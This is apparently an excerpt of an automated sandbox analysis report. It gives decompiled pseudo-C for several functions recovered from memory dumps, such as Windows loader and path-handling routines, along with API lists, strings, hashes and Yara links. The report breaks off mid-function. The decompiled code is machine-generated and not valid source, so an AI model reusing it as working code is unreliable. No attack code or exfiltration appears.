Instruction Fuzzy Hash: 7C4108B5A00704BFEB25DB58DCC5FBEBFA8EB00714F08059AE911AF591D3749940C791

Uniqueness

Uniqueness Score: -1.00%

Function 003358A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
nativeCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E003358A4() {
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				intOrPtr _t29;
				long _t40;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				void* _t67;

				_t44 = _t67;
				_push(_t45);
				_push(_t45);
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_t22 =  *0x378064 & 0x000000ff;
				_v24 = _t45;
				_push(0);
				_push(0x36b8f8);
				_v16 = 0;
				_v20 = 0xc0000001;
				 *0x35d560 = _t22;
				L003482C1();
				if(_t22 != 0) {
					_t60 = 1;
					_v16 = 1;
				} else {
					_t48 =  *0x373cb8;
					if( *0x373cb8 == 0) {
						_t48 = 0x373ab0;
					}
					_t51 =  *0x373cc0;
					E003436CB(_t44, _t48,  *0x373cc0, 0);
					 *0x35d56c = 0;
					 *0x35d5ac = 0;
					 *0x35d564 = 1;
					 *0x35d55c = 1;
					 *0x35d0c0 = 1;
					_t29 =  *0x35d5dc; // 0x0
					_t49 = 0x24;
					 *0x35d5a8 = 0;
					 *0x35d5a4 = 0;
					 *0x35d568 = _t29;
					_t62 = E003400B0(_t49);
					if(_t62 == 0) {
						L14:
						E00359287(_t49);
						__imp__longjmp(0x36b8b8, 1);
						goto L15;
					} else {
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
						_t49 = 0x24;
						_v36 = _t62;
						 *((intOrPtr*)(_t62 + 0x20)) = 0;
						_t57 = E003400B0(_t49);
						if(_t57 == 0) {
							goto L14;
						} else {
							 *_t57 = 0;
							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
							_v40 = _t57;
							 *((intOrPtr*)(_t57 + 0x20)) = 0;
							E0033450B(_v24, _t62, _t57);
							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
							_v20 = _t40;
							if(_t40 >= 0) {
								_v28 = 2;
								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
							}
							_t51 = _t57;
							_t49 = _t62;
							if( *0x35d55c == 4) {
								L15:
								E00358664(_t49, _t51);
								_t60 = _v16;
							} else {
								_t60 = E003348E6(_t49, _t51);
								_v16 = _t60;
							}
						}
					}
					E0034274C(0x373d00, 0x104, L"%9d",  *0x35d56c);
					E0033C108(_t49, 0x2336, 1, 0x373d00);
					 *0x35d560 =  *0x378064 & 0x000000ff;
				}
				if(_v20 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
				}
				return _t60;
			}

0x003358a7
0x003358a9
0x003358aa
0x003358b5
0x003358be
0x003358c9
0x003358cc
0x003358cd
0x003358d2
0x003358d5
0x003358dc
0x003358e1
0x003358ea
0x003497fc
0x003497fd
0x003358f0
0x003358f0
0x003358f8
0x00349805
0x00349805
0x003358fe
0x00335905
0x0033590c
0x00335913
0x0033591b
0x00335920
0x00335925
0x0033592a
0x0033592f
0x00335930
0x00335936
0x0033593c
0x00335946
0x0033594a
0x0034980f
0x0034980f
0x0034981b
0x00000000
0x00335950
0x00335950
0x00335954
0x00335957
0x00335958
0x0033595b
0x00335963
0x00335967
0x00000000
0x0033596d
0x00335972
0x00335976
0x0033597a
0x0033597d
0x00335980
0x00335991
0x00335997
0x0033599c
0x003359a3
0x003359af
0x003359af
0x003359bc
0x003359be
0x003359c0
0x00349821
0x00349821
0x00349826
0x003359c6
0x003359cb
0x003359cd
0x003359cd
0x003359c0
0x00335967
0x003359e6
0x003359f3
0x00335a02
0x00335a02
0x00335a0b
0x00335a17
0x00335a17
0x00335a27

APIs

_setjmp3.MSVCRT ref: 003358E1

Part of subcall function 003436CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,0033590A,00000000), ref: 003436F0

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 00335991
NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 003359AF
NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 00335A17
longjmp.MSVCRT(0036B8B8,00000001,00000000), ref: 0034981B

Strings

%9d, xrefs: 003359DB

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
String ID: %9d
API String ID: 4212706909-2241623522
Opcode ID: 81edcbe4cbbedc69371ebe11599f943c53dba94a84ff557a796f18d09a5fa447
Instruction ID: 30e1545c5bd3fb6368fdf43efb000eb94fc1d60c9ef1103d078334c22c9a817e
Opcode Fuzzy Hash: 81edcbe4cbbedc69371ebe11599f943c53dba94a84ff557a796f18d09a5fa447
Instruction Fuzzy Hash: DA41C1B0E04310AFD723DF6A9C46B6ABBFCEB45725F10421AE514EB2A1EB705941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03417CF9, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 102
nativeCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E03417CF9(void* __ebx, void __ecx, void* __edi, void* __esi, void* __eflags) {
				signed char _t31;
				void _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;

				_push(0x24);
				_push(0x34706b0);
				E033ED08C(__ebx, __edi, __esi);
				_t50 = __ecx;
				 *((intOrPtr*)(_t53 - 0x24)) = __ecx;
				 *((char*)(_t53 - 0x19)) = 0;
				 *(_t53 - 0x30) = __ecx;
				_t43 = NtQueryVirtualMemory(0xffffffff, 0, 4, _t53 - 0x30, 8, 0);
				if(_t30 < 0) {
					_t31 =  *0x3485780; // 0x0
					if((_t31 & 0x00000003) != 0) {
						E03415510("minkernel\\ntdll\\ldrfind.c", 0x79b, "LdrpProtectAndRelocateImage", 0, "Querying large page info failed with status 0x%08lx\n", _t43);
						_t54 = _t54 + 0x18;
						_t31 =  *0x3485780; // 0x0
					}
					if((_t31 & 0x00000010) != 0) {
						asm("int3");
					}
				} else {
					if(( *(_t53 - 0x2c) & 0x00000001) != 0 && ( *(_t53 - 0x2c) & 0x00800000) != 0) {
						 *((char*)(_t53 - 0x19)) = 1;
					}
				}
				if( *((intOrPtr*)(_t53 - 0x19)) != 0) {
					L12:
					 *((intOrPtr*)(_t53 - 4)) = 0;
					_t54 = _t54 - 0x14;
					_t52 = E03428888(_t50, 0);
					 *((intOrPtr*)(_t53 - 0x28)) = _t52;
					 *((intOrPtr*)(_t53 - 4)) = 0xfffffffe;
					if(_t52 < 0 ||  *((char*)(_t53 - 0x19)) != 0) {
						goto L21;
					} else {
						_t52 = E03417E63(_t50, 1);
						if(_t52 >= 0) {
							goto L21;
						}
						if(( *0x3485780 & 0x00000003) == 0) {
							goto L19;
						}
						_push(_t52);
						_push(_t50);
						_push("Changing the protection of the executable at %p failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpProtectAndRelocateImage");
						_push(0x7bd);
						goto L18;
					}
				} else {
					_t52 = E03417E63(_t50, 0);
					if(_t52 >= 0) {
						goto L12;
					}
					if(( *0x3485780 & 0x00000003) == 0) {
						L19:
						if(( *0x3485780 & 0x00000010) != 0) {
							asm("int3");
						}
						L21:
						if(( *0x3485780 & 0x00000009) != 0) {
							E03415510("minkernel\\ntdll\\ldrfind.c", 0x7c7, "LdrpProtectAndRelocateImage", 4, "Status: 0x%08lx\n", _t52);
						}
						return E033ED0D1(_t52);
					}
					_push(_t52);
					_push(_t50);
					_push("Changing the protection of the executable at %p failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpProtectAndRelocateImage");
					_push(0x7a5);
					L18:
					_push("minkernel\\ntdll\\ldrfind.c");
					E03415510();
					_t54 = _t54 + 0x1c;
					goto L19;
				}
			}

0x03417cf9
0x03417cfb
0x03417d00
0x03417d05
0x03417d07
0x03417d0c
0x03417d0f
0x03417d23
0x03417d27
0x03417d3e
0x03417d45
0x03417d5d
0x03417d62
0x03417d65
0x03417d65
0x03417d6c
0x03417d6e
0x03417d6e
0x03417d29
0x03417d2d
0x03417d38
0x03417d38
0x03417d2d
0x03417d72
0x03417da4
0x03417da4
0x03417da7
0x03417db1
0x03417db3
0x03417db6
0x03417de8
0x00000000
0x03417df0
0x03417df9
0x03417dfd
0x00000000
0x00000000
0x03417e06
0x00000000
0x00000000
0x03417e08
0x03417e09
0x03417e0a
0x03417e0f
0x03417e10
0x03417e15
0x00000000
0x03417e15
0x03417d74
0x03417d7d
0x03417d81
0x00000000
0x00000000
0x03417d8a
0x03417e27
0x03417e2e
0x03417e30
0x03417e30
0x03417e31
0x03417e38
0x03417e51
0x03417e56
0x03417e60
0x03417e60
0x03417d90
0x03417d91
0x03417d92
0x03417d97
0x03417d98
0x03417d9d
0x03417e1a
0x03417e1a
0x03417e1f
0x03417e24
0x00000000
0x03417e24

APIs

NtQueryVirtualMemory.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,00000000,00000004,?,00000008,00000000,034706B0,00000024,0340999B,?,00000000,?,00000000,00000000,?), ref: 03417D1E

Strings

Querying large page info failed with status 0x%08lx, xrefs: 03417D48
Changing the protection of the executable at %p failed with status 0x%08lx, xrefs: 03417D92, 03417E0A
LdrpProtectAndRelocateImage, xrefs: 03417D4E, 03417D98, 03417E10, 03417E42
Status: 0x%08lx, xrefs: 03417E3B
minkernel\ntdll\ldrfind.c, xrefs: 03417D58, 03417E1A, 03417E4C

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Memory.0000001QueryVirtual
String ID: Changing the protection of the executable at %p failed with status 0x%08lx$LdrpProtectAndRelocateImage$Querying large page info failed with status 0x%08lx$Status: 0x%08lx$minkernel\ntdll\ldrfind.c
API String ID: 56184443-3846273245
Opcode ID: 94a6bdd0ef168f124f4df3090bb460eee5df4fc6f6e8b1033d0abc923993a534
Instruction ID: 071d40d9d873d53bdbbc42754d560d1995bb761159117381fd0240e8e74f96f9
Opcode Fuzzy Hash: 94a6bdd0ef168f124f4df3090bb460eee5df4fc6f6e8b1033d0abc923993a534
Instruction Fuzzy Hash: 8631DE74E44B486EE732E6684CC5FBF7ED59B42A18F48018EF9503E2C6D3A84C61939D

Uniqueness

Uniqueness Score: -1.00%

Function 00335226, Relevance: 9.5, APIs: 6, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00335226(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				LPWSTR* _v36;
				void _v556;
				signed int _v560;
				signed short** _v564;
				WCHAR* _v568;
				LPWSTR* _v572;
				intOrPtr _v576;
				LPWSTR* _v580;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed short** _t160;
				intOrPtr _t164;
				LPWSTR* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				signed int _t176;
				void* _t179;
				signed short** _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				signed int _t194;
				void* _t195;
				signed short _t197;
				intOrPtr _t199;
				void* _t205;
				void* _t207;
				void* _t209;
				signed short _t211;
				void* _t213;
				WCHAR* _t222;
				signed short* _t225;
				intOrPtr* _t226;
				void* _t228;
				intOrPtr _t230;
				signed short* _t235;
				signed int _t236;
				intOrPtr* _t244;
				short* _t247;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t256;
				intOrPtr* _t259;
				void* _t262;
				intOrPtr* _t263;
				signed short* _t266;
				signed short* _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t276;
				signed short* _t280;
				void* _t288;
				signed short* _t289;
				void* _t292;
				short* _t293;
				void* _t297;
				short _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				signed int _t306;
				signed short* _t307;
				void* _t314;
				intOrPtr* _t316;
				intOrPtr* _t322;
				LPWSTR* _t324;
				void* _t325;
				void* _t326;
				WCHAR* _t327;
				void* _t328;
				void* _t331;
				intOrPtr _t333;
				void* _t334;
				intOrPtr _t336;
				intOrPtr* _t340;
				intOrPtr* _t341;
				short* _t344;
				void* _t346;
				intOrPtr* _t347;
				signed int _t349;
				intOrPtr _t353;
				intOrPtr _t357;
				signed int _t363;

				_t295 = __edx;
				_t236 = _t363;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t236 + 4));
				_t361 = (_t363 & 0xfffffff8) + 4;
				_t146 =  *0x35d0b4; // 0xd59bd0e8
				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
				_t322 =  *((intOrPtr*)(_t236 + 8));
				_t333 = __ecx;
				_v28 = 0x104;
				_v584 = __edx;
				_v576 = __ecx;
				_v568 = _t322;
				_v572 = 0;
				_v580 = 0;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E00340C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t324 = 1;
					L25:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t325);
					_pop(_t334);
					return E00346FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
				}
				_t160 =  *(_v584 + 0x20);
				_v564 = _t160;
				if(_t160 == 0) {
					_t161 =  *0x373cb8;
					if( *0x373cb8 == 0) {
						_t161 = 0x373ab0;
					}
					E00341040(_t322,  *(_t236 + 0xc), _t161);
					_t244 = _t322;
					_v572 = 0;
					_t326 = 2;
					_t297 = _t244 + 2;
					do {
						_t164 =  *_t244;
						_t244 = _t244 + _t326;
					} while (_t164 != 0);
					_t165 = _v568;
					_t336 = _v576;
					_t298 = 0x5c;
					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
					if(_t165 >= _t247) {
						L38:
						 *_t247 = _t298;
						 *((short*)(_t247 + 2)) = 0;
						L39:
						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
							L54:
							_t299 = _v568;
							_t248 = _t299 + 2;
							do {
								_t167 =  *_t299;
								_t299 = _t299 + _t326;
							} while (_t167 != 0);
							_v572 = _t299 - _t248 >> 1;
							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_t295 = 0;
							_t249 = _t340;
							_v560 = _t249 + 2;
							do {
								_t169 =  *_t249;
								_t249 = _t249 + _t326;
							} while (_t169 != 0);
							_t327 = _v568;
							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
								L53:
								_t341 = _v564;
								L89:
								_v580 = 1;
								L20:
								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
									L24:
									_t324 = _v580;
									goto L25;
								}
								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
										goto L90;
									}
								} else {
									L90:
									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t328 != 0xffffffff) {
										_t176 = GetFileType(_t328);
										CloseHandle(_t328);
										if((_t176 & 0xffff7fff) == 1) {
											_t344 = _v568;
											_t295 = 0x400023d3;
											_t179 = E00359583(_t344, 0x400023d3, 0x400023d4);
											if(_t179 == 0) {
												 *_t344 = 0;
											} else {
												if(_t179 == 0) {
													_t183 = _v564;
													if(_t183 == 0) {
														_t183 = _v584;
													}
													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L24;
							}
							_push(_t340);
							L80:
							_t295 =  *(_t236 + 0xc);
							E003418C0(_t327,  *(_t236 + 0xc));
							_t341 = _v564;
							goto L20;
						}
						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
						_t256 = _t303;
						_v572 = _t303;
						_v560 = _t256 + 2;
						do {
							_t186 =  *_t256;
							_t256 = _t256 + _t326;
						} while (_t186 != 0);
						if(_t256 == _v560) {
							goto L54;
						}
						_t259 = _t303;
						_t295 = 0;
						_t346 = _t259 + 2;
						do {
							_t187 =  *_t259;
							_t259 = _t259 + _t326;
						} while (_t187 != 0);
						if(_t259 == _t346) {
							L52:
							_t327 = _v568;
							goto L53;
						}
						_t347 = _v568;
						_t262 = _t347 + 2;
						do {
							_t188 =  *_t347;
							_t347 = _t347 + _t326;
						} while (_t188 != 0);
						_t263 = _v572;
						_t349 = _t347 - _t262 >> 1;
						_t72 = _t263 + 2; // 0x2
						_v560 = _t72;
						do {
							_t190 =  *_t263;
							_t263 = _t263 + _t326;
						} while (_t190 != 0);
						_t295 = _v572;
						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						_push(_t295);
						goto L80;
					} else {
						goto L33;
					}
					do {
						L33:
						if( *_t165 == _t298) {
							_v572 = _t165;
						}
						_t165 = _t165 + _t326;
					} while (_t165 < _t247);
					if(_v572 == 0 || _v572 < _t247 - 2) {
						goto L38;
					} else {
						goto L39;
					}
				}
				_t266 =  *_t160;
				_t331 = 2;
				_t194 =  *_t266 & 0x0000ffff;
				_t306 = _t194;
				_v560 = _t306;
				if(_t194 == 0) {
					L6:
					_t195 = 0x3a;
					if(_t306 == _t195) {
						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
							L73:
							_t307 =  *_v564;
							_t267 =  &(_t307[1]);
							do {
								_t197 =  *_t307;
								_t307 = _t307 + _t331;
							} while (_t197 != 0);
							_t295 = _t307 - _t267 >> 1;
							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_v560 = _t269 + 2;
							do {
								_t199 =  *_t269;
								_t269 = _t269 + _t331;
							} while (_t199 != 0);
							_t353 = _v576;
							_t327 = _v568;
							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
								goto L53;
							}
							E00341040(_t327,  *(_t236 + 0xc),  *_v564);
							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
							L79:
							_push(_t205);
							goto L80;
						}
						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
						_t273 = _t295;
						_v560 = _t273 + 2;
						do {
							_t207 =  *_t273;
							_t273 = _t273 + _t331;
						} while (_t207 != 0);
						if(_t273 == _v560) {
							goto L73;
						}
						_t276 = _t295;
						_v560 = _t276 + 2;
						do {
							_t209 =  *_t276;
							_t276 = _t276 + _t331;
						} while (_t209 != 0);
						if(_t276 == _v560) {
							goto L52;
						}
						_t280 =  *_v564;
						_v560 =  &(_t280[1]);
						do {
							_t211 =  *_t280;
							_t280 = _t280 + _t331;
						} while (_t211 != 0);
						_t357 = _v576;
						_v572 = _t280 - _v560 >> 1;
						_v560 = _t295 + 2;
						do {
							_t213 =  *_t295;
							_t295 = _t295 + _t331;
						} while (_t213 != 0);
						if( &(_v572[0]) + _t295 > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						E00341040(_t327,  *(_t236 + 0xc),  *_v564);
						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
						goto L79;
					}
					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
						L17:
						_t341 = _v564;
						_t327 = _v568;
						_t295 =  *(_t236 + 0xc);
						if(E00335400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
							E0035985A(_t220);
							_v580 = 1;
						}
						_t222 = _v36;
						if(_t222 == 0) {
							_t222 =  &_v556;
						}
						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
							_t288 = 0x6f;
							E0035985A(_t288);
							goto L89;
						} else {
							goto L20;
						}
					}
					_t313 = _v564;
					_t225 =  *_v564;
					_t289 = _t225;
					if(_v560 == 0) {
						L12:
						if( *_t289 != 0x2a) {
							goto L17;
						}
						_t226 = E00335846( *_t313);
						_t314 = 0x5c;
						if( *_t226 != _t314) {
							goto L17;
						}
						_t292 = E00342349( *((intOrPtr*)(_t333 + 4)), _t314);
						if(_t292 == 0) {
							_t293 =  *((intOrPtr*)(_t333 + 4));
							_t228 = 0x3a;
							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
								_t293 = _t293 + 4;
							}
						} else {
							_t293 = _t292 + _t331;
						}
						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
							_v560 = _t316 + 2;
							do {
								_t230 =  *_t316;
								_t316 = _t316 + _t331;
							} while (_t230 != _v572);
							if(_t316 != _v560) {
								 *_t293 = 0;
								E003418C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
							}
						}
						goto L17;
					} else {
						goto L10;
						L10:
						_t289 = _t225;
						_t225 = _t225 + _t331;
						if( *_t225 != 0) {
							goto L10;
						} else {
							_t333 = _v576;
							goto L12;
						}
					}
				} else {
					goto L4;
					L4:
					_t235 = _t266;
					_t266 = _t266 + _t331;
					if( *_t266 != 0) {
						goto L4;
					} else {
						_t306 =  *_t235 & 0x0000ffff;
						goto L6;
					}
				}
			}

0x00335226
0x00335229
0x0033522b
0x0033522c
0x00335237
0x0033523b
0x00335243
0x0033524a
0x0033524f
0x00335257
0x00335259
0x0033525e
0x0033526c
0x00335273
0x00335279
0x0033527f
0x00335285
0x00335288
0x0033528c
0x003352b5
0x003353f5
0x003353d2
0x003353d5
0x003353e1
0x003353e4
0x003353f0
0x003353f0
0x003352c1
0x003352c4
0x003352cc
0x0034915f
0x00349166
0x00349168
0x00349168
0x00349173
0x00349178
0x0034917e
0x00349186
0x00349187
0x0034918a
0x0034918a
0x0034918d
0x0034918f
0x00349194
0x0034919c
0x003491a6
0x003491a7
0x003491ac
0x003491d3
0x003491d5
0x003491d8
0x003491dc
0x003491e3
0x0034929f
0x0034929f
0x003492a7
0x003492aa
0x003492aa
0x003492ad
0x003492af
0x003492be
0x003492c7
0x003492ca
0x003492cc
0x003492d1
0x003492d7
0x003492d7
0x003492da
0x003492dc
0x003492ed
0x003492fd
0x00349294
0x00349294
0x003494f9
0x003494f9
0x003353a5
0x003353a9
0x003353cc
0x003353cc
0x00000000
0x003353cc
0x003353b2
0x003353c6
0x00000000
0x00000000
0x00349508
0x00349508
0x00349521
0x00349526
0x0034952d
0x0034953c
0x00349547
0x0034954d
0x00349553
0x00349566
0x00349568
0x00349591
0x0034956a
0x0034956d
0x00349573
0x0034957b
0x0034957d
0x0034957d
0x00349583
0x00349583
0x0034956d
0x00349568
0x00349547
0x00349526
0x00000000
0x003353b2
0x003492ff
0x00349462
0x00349462
0x00349467
0x0034946c
0x00000000
0x0034946c
0x003491ec
0x003491f4
0x003491f6
0x003491ff
0x00349205
0x00349205
0x00349208
0x0034920a
0x00349217
0x00000000
0x00000000
0x0034921d
0x0034921f
0x00349221
0x00349224
0x00349224
0x00349227
0x00349229
0x00349232
0x0034928e
0x0034928e
0x00000000
0x0034928e
0x00349234
0x0034923c
0x0034923f
0x0034923f
0x00349242
0x00349244
0x0034924b
0x00349251
0x00349255
0x00349258
0x0034925e
0x0034925e
0x00349261
0x00349263
0x00349271
0x00349280
0x00000000
0x00000000
0x00349282
0x00349288
0x00000000
0x00000000
0x00000000
0x00000000
0x003491ae
0x003491ae
0x003491b1
0x003491b3
0x003491b3
0x003491b9
0x003491bb
0x003491c6
0x00000000
0x00000000
0x00000000
0x00000000
0x003491c6
0x003352d2
0x003352d6
0x003352d7
0x003352da
0x003352dc
0x003352e5
0x003352f5
0x003352f7
0x003352fb
0x0034930c
0x003493e9
0x003493f1
0x003493f3
0x003493f6
0x003493f6
0x003493f9
0x003493fb
0x00349408
0x0034940d
0x00349415
0x0034941b
0x0034941b
0x0034941e
0x00349420
0x0034942e
0x00349434
0x00349443
0x00000000
0x00000000
0x00349456
0x0034945e
0x00349461
0x00349461
0x00000000
0x00349461
0x00349315
0x0034931d
0x00349322
0x00349328
0x00349328
0x0034932b
0x0034932d
0x0034933a
0x00000000
0x00000000
0x00349340
0x00349347
0x0034934d
0x0034934d
0x00349350
0x00349352
0x0034935f
0x00000000
0x00000000
0x0034936d
0x00349372
0x00349378
0x00349378
0x0034937b
0x0034937d
0x0034938b
0x00349393
0x0034939b
0x003493a1
0x003493a1
0x003493a4
0x003493a6
0x003493c1
0x00000000
0x00000000
0x003493cd
0x003493da
0x003493e2
0x00000000
0x003493e2
0x00335305
0x00335362
0x00335365
0x0033536b
0x00335373
0x0033537f
0x003494dd
0x003494e2
0x003494e2
0x00335385
0x0033538a
0x003353f8
0x003353f8
0x0033539f
0x003494f3
0x003494f4
0x00000000
0x00000000
0x00000000
0x00000000
0x0033539f
0x0033530f
0x00335315
0x00335317
0x00335319
0x0033532c
0x00335330
0x00000000
0x00000000
0x00335334
0x0033533b
0x0033533f
0x00000000
0x00000000
0x00335349
0x0033534d
0x00349477
0x0034947c
0x00349481
0x00349487
0x00349487
0x00335353
0x00335353
0x00335353
0x0033535c
0x00349492
0x0034949b
0x003494a1
0x003494a1
0x003494a4
0x003494a6
0x003494b7
0x003494bf
0x003494d1
0x003494d1
0x003494b7
0x00000000
0x0033531b
0x0033531b
0x0033531d
0x0033531d
0x0033531f
0x00335324
0x00000000
0x00335326
0x00335326
0x00000000
0x00335326
0x00335324
0x003352e7
0x003352e7
0x003352e9
0x003352e9
0x003352eb
0x003352f0
0x00000000
0x003352f2
0x003352f2
0x00000000
0x003352f2
0x003352f0

APIs

memset.MSVCRT ref: 0033528C

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 00335394
??_V@YAXPAX@Z.MSVCRT ref: 003353D5

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$FullNamePath
String ID:
API String ID: 3158150540-0
Opcode ID: e3ae86a4c86b7d3e51aefcae5091329672f3fa1615d06bca43ff1248ed7d0411
Instruction ID: 4835e48699165343251533788194b862fcd89c3228bee6a77faafac304ed6e36
Opcode Fuzzy Hash: e3ae86a4c86b7d3e51aefcae5091329672f3fa1615d06bca43ff1248ed7d0411
Instruction Fuzzy Hash: 50028335A001159BCB26DF68DC897AAB3F5FF48314F1986EAD8099B254D774BE82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0034245C, Relevance: 9.2, APIs: 6, Instructions: 154
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0034245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				signed int _v608;
				void _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				WCHAR* _v628;
				void* _v632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				void* _t45;
				void _t47;
				void* _t53;
				void _t54;
				void _t58;
				char* _t69;
				char* _t71;
				intOrPtr* _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t80;
				void* _t81;
				signed int _t83;
				void* _t84;
				void* _t91;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				int _t104;
				void* _t105;
				signed int _t106;
				signed int _t108;

				_t90 = __edx;
				_t77 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x274;
				_t42 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t42 ^ _t108;
				_t73 = __ecx;
				_v616 = __edx;
				_v628 = __ecx;
				_v624 = 0;
				_t99 =  &(__ecx[1]);
				do {
					_t44 =  *_t73;
					_t73 = _t73 + 2;
				} while (_t44 != 0);
				_t75 = _t73 - _t99 >> 1;
				if(_t75 > __edx) {
					L21:
					_t45 = 0;
				} else {
					_t97 =  &(__ecx[3]);
					_t101 = _t97;
					_v632 = _t101;
					do {
						_t47 =  *_t97 & 0x0000ffff;
						_v612 = _t47;
						if(_t47 == 0 || _t47 == 0x5c) {
							 *_t97 = 0;
							_t80 = FindFirstFileW(_t77,  &_v604);
							_t47 = _v612;
							 *_t97 = _t47;
							if(_t80 == 0xffffffff) {
								_t97 = _t97 + 2;
